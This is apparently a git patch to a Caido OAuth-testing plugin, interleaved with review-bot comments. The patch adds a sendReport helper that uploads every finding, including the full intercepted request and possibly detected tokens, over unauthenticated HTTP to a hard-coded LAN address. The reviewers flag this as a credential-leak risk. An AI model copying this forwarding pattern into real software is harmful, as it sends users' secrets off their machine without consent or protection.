From 0eca258096c22663b06c1ef0c348b17f1224b06e Mon Sep 17 00:00:00 2001 From: imnyang Date: Thu, 5 Jun 2025 21:47:25 +0900 Subject: [PATCH 1/2] temp commit --- packages/backend/src/controller/PKCECheck.ts | 17 ++++++++------ packages/backend/src/index.ts | 1 + packages/backend/src/utils/controlTower.ts | 24 ++++++++++++++++++++ 3 files changed, 35 insertions(+), 7 deletions(-) create mode 100644 packages/backend/src/utils/controlTower.ts diff --git a/packages/backend/src/controller/PKCECheck.ts b/packages/backend/src/controller/PKCECheck.ts index 6fd4ee7..d7e0042 100644 --- a/packages/backend/src/controller/PKCECheck.ts +++ b/packages/backend/src/controller/PKCECheck.ts @@ -1,5 +1,6 @@ import type { SDK } from "caido:plugin"; import { Body, RequestSpec, type Request } from "caido:utils"; +import { sendReport } from "../utils/controlTower"; export class PKCECheck { // 필요한 PKCE 파라미터 목록 @@ -79,13 +80,14 @@ export class PKCECheck { const reference = isOpenID ? "https://openid.net/specs/openid-igov-oauth2-1_0-02.html#rfc.section.3.1.7" : "https://datatracker.ietf.org/doc/html/rfc7636"; - - await sdk.findings.create({ - title, - description: `PKCE downgrade vulnerability detected!\n\nOriginal URL: ${url}\nDowngraded URL: ${downgradedUrl}\n\nBoth requests returned authorization codes, indicating the server accepts requests without PKCE protection.\n\nReference: ${reference}`, - request: req, - reporter: "PKCE Checker", - }); + await this.reportFinding( + sdk, + req, + url, + isOpenID, + title, + `PKCE downgrade vulnerability detected!\n\nOriginal URL: ${url}\nDowngraded URL: ${downgradedUrl}\n\nBoth requests returned authorization codes, indicating the server accepts requests without PKCE protection.\n\nReference: ${reference}` + ); return true; } @@ -133,5 +135,6 @@ export class PKCECheck { request: req, reporter: "PKCE Checker", }); + sendReport(sdk, fullTitle, `${message} (${url})`, req, "PKCE Checker"); } } 
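Review bot: On the downgrade path the forwarded report carries the URL twice, because the description passed at the new `this.reportFinding(...)` call already contains `Original URL: ${url}` and the last hunk sends `${message} (${url})`. If no other caller relies on that suffix, forward the text unchanged with `await sendReport(sdk, fullTitle, message, req, "PKCE Checker");`; otherwise drop the URL from this caller's string. reportFinding now also makes an outbound request, so its doc comment should say so, for example `// Also uploads the finding via sendReport (network side effect).` Its signature and most of its body lie outside these hunks, so the parameter mapping is inferred from the call site.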
diff --git a/packages/backend/src/index.ts b/packages/backend/src/index.ts index 43d7516..65c8f03 100644 --- a/packages/backend/src/index.ts +++ b/packages/backend/src/index.ts @@ -40,6 +40,7 @@ export function init(sdk: SDK) { sdk.events.onInterceptRequest(async (sdk, req: Request) => { await pkceCheckController.test(sdk, req); }); + /* sdk.events.onInterceptRequest(async (sdk, req: Request) => { const result = diff --git a/packages/backend/src/utils/controlTower.ts b/packages/backend/src/utils/controlTower.ts new file mode 100644 index 0000000..c284f8e --- /dev/null +++ b/packages/backend/src/utils/controlTower.ts @@ -0,0 +1,24 @@ +import type { SDK } from "caido:plugin"; +import { Body, RequestSpec, type Request } from "caido:utils"; + +export async function sendReport( + sdk: SDK, + title: string, + description: string, + request: Request, + reporter: string +) { + const spec = new RequestSpec("http://192.168.0.9:4020/report"); + spec.setMethod("POST"); + spec.setHeader("Content-Type", "application/json"); + + const body = new Body(JSON.stringify({ + title, + description, + request: request.toSpec(), + reporter + })); + spec.setBody(body); + + return await sdk.requests.send(spec); +} \ No newline at end of file From 1e79dcabaab37c76023df1760c917483341f2cda Mon Sep 17 00:00:00 2001 From: imnyang Date: Thu, 5 Jun 2025 21:49:59 +0900 Subject: [PATCH 2/2] Temp --- packages/backend/src/controller/PKCECheck.ts | 2 +- .../backend/src/controller/accessTokenDetector.ts | 15 +++++++++++++++ packages/backend/src/controller/csrfCheck.ts | 9 +++++++++ .../backend/src/controller/redirect_uriBypass.ts | 8 ++++++++ 4 files changed, 33 insertions(+), 1 deletion(-) diff --git a/packages/backend/src/controller/PKCECheck.ts b/packages/backend/src/controller/PKCECheck.ts index d7e0042..9f7bd40 100644 --- a/packages/backend/src/controller/PKCECheck.ts +++ b/packages/backend/src/controller/PKCECheck.ts 
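Review bot: sendReport posts every finding, together with `request.toSpec()`, to the hard-coded `http://192.168.0.9:4020/report` over cleartext HTTP with no authentication. Intercepted OAuth traffic (authorization headers, cookies, codes and tokens in the request or the description) therefore leaves the Caido instance for whichever host holds that address on the user's network. The endpoint should come from plugin configuration, default to off, and use HTTPS with a credential the collector verifies. The payload should be an explicit minimal object rather than the whole request, which also avoids depending on how `JSON.stringify` treats a `RequestSpec` (not visible here). A failed `sdk.requests.send` currently rejects into every caller, so the sketch below catches and logs inside sendReport; `reportEndpoint` stands in for the configured value.

```typescript
export async function sendReport(
  // … unchanged: parameter list …
) {
  // reportEndpoint: collector URL read from plugin configuration; unset means reporting is off
  if (!reportEndpoint) return undefined;

  try {
    const spec = new RequestSpec(reportEndpoint);
    // … unchanged: method and Content-Type header …

    // Send only what triage needs; headers and bodies of intercepted
    // OAuth requests can carry live credentials.
    const body = new Body(JSON.stringify({
      title,
      description,
      request: { method: request.getMethod(), url: request.getUrl() },
      reporter
    }));
    spec.setBody(body);

    return await sdk.requests.send(spec);
  } catch (error) {
    // A collector outage must not break the detection path.
    sdk.console.error(`Error sending report: ${error}`);
    return undefined;
  }
}
```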
@@ -135,6 +135,6 @@ export class PKCECheck { request: req, reporter: "PKCE Checker", }); - sendReport(sdk, fullTitle, `${message} (${url})`, req, "PKCE Checker"); + await sendReport(sdk, fullTitle, `${message} (${url})`, req, "PKCE Checker"); } } diff --git a/packages/backend/src/controller/accessTokenDetector.ts b/packages/backend/src/controller/accessTokenDetector.ts index c0570d0..c6834c5 100644 --- a/packages/backend/src/controller/accessTokenDetector.ts +++ b/packages/backend/src/controller/accessTokenDetector.ts @@ -1,5 +1,6 @@ import type { Request, Response } from "caido:utils"; import type { SDK, DefineAPI } from "caido:plugin"; +import { sendReport } from "../utils/controlTower"; // 토큰 누출 검사 결과를 담는 구조 export interface TokenLeakResult { @@ -21,6 +22,13 @@ export class AccessTokenLeakController { request, reporter: "AccessTokenLeak", }); + await sendReport( + sdk, + result.title, + result.description, + request, + "AccessTokenLeak" + ); } } @@ -33,6 +41,13 @@ export class AccessTokenLeakController { request, reporter: "AccessTokenLeak", }); + await sendReport( + sdk, + result.title, + result.description, + request, + "AccessTokenLeak" + ); } } diff --git a/packages/backend/src/controller/csrfCheck.ts b/packages/backend/src/controller/csrfCheck.ts index 8a6f723..bd96bdd 100644 --- a/packages/backend/src/controller/csrfCheck.ts +++ b/packages/backend/src/controller/csrfCheck.ts @@ -1,6 +1,7 @@ import type { Request, Response } from "caido:utils"; import type { SDK, DefineAPI } from "caido:plugin"; import { HttpUtils } from "../utils/http"; +import { sendReport } from "../utils/controlTower"; const httpUtils = new HttpUtils(); 
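Review bot: The token-leak detector is where forwarding is most sensitive: both added blocks in accessTokenDetector.ts pass `result.description` and `request` to sendReport unchanged. If the description quotes the detected token (its construction is outside these hunks), the secret itself is uploaded. Mask the value before it leaves the plugin, for instance by sending only a short prefix and the length, and keep the full value in the local finding. The two blocks are identical, so one private helper called as `await this.report(sdk, result, request);` that creates the finding and sends the masked report would keep them from drifting apart. The enclosing methods start and end outside the hunks.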
@@ -269,6 +270,14 @@ export class CsrfCheck { request, reporter: "csrf reporter", }); + await sendReport( + sdk, + "CSRF Vulnerability Detected", + `A CSRF vulnerability was detected in the request.\n\nRequest: ${request.getMethod()} ${request.getUrl()}\n\nDetails: ${result}`, + request, + "csrf reporter" + ); + } } catch (error) { sdk.console.error(`Error creating finding: ${error}`); diff --git a/packages/backend/src/controller/redirect_uriBypass.ts b/packages/backend/src/controller/redirect_uriBypass.ts index ce521cb..a9a9c57 100644 --- a/packages/backend/src/controller/redirect_uriBypass.ts +++ b/packages/backend/src/controller/redirect_uriBypass.ts @@ -1,5 +1,6 @@ import type { Request, Response } from "caido:utils"; import type { SDK } from "caido:plugin"; +import { sendReport } from "../utils/controlTower"; export class RedirectBypassController { // redirect_uri를 확인하는 함수 @@ -54,6 +55,13 @@ export class RedirectBypassController { request: req, reporter: "gyu", }); + await sendReport( + sdk, + "Redirect URI Bypass Detected", + `A redirect URI bypass was detected.\nRedirect URI: ${result.redirectUri}`, + req, + "gyu" + ); } } }
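Review bot: A failed upload in csrfCheck.ts will be logged as `Error creating finding`, because the new `await sendReport(...)` sits in the same `try` as `sdk.findings.create` and shares its `catch`. Give the upload its own guard with its own message, `try { await sendReport(...); } catch (error) { sdk.console.error(`Error sending report: ${error}`); }`, so operators can tell a collector outage from a local failure. `Details: ${result}` will render as `[object Object]` if `result` is not a string; its type is not visible in this hunk, so confirm or serialise it explicitly. The blank line added before the closing brace can be dropped.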
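Review bot: The new sendReport call in redirect_uriBypass.ts repeats the reporter label `"gyu"`, which reads as a personal handle, not the name of the check. Once reports from several detectors land in one collector, the reporter string is what identifies their source. A descriptive value such as `"RedirectUriBypass"`, used in both `sdk.findings.create` and `sendReport`, matches the other controllers. `result.redirectUri` is forwarded verbatim, so the cleartext-transport concern in controlTower.ts applies to this value too.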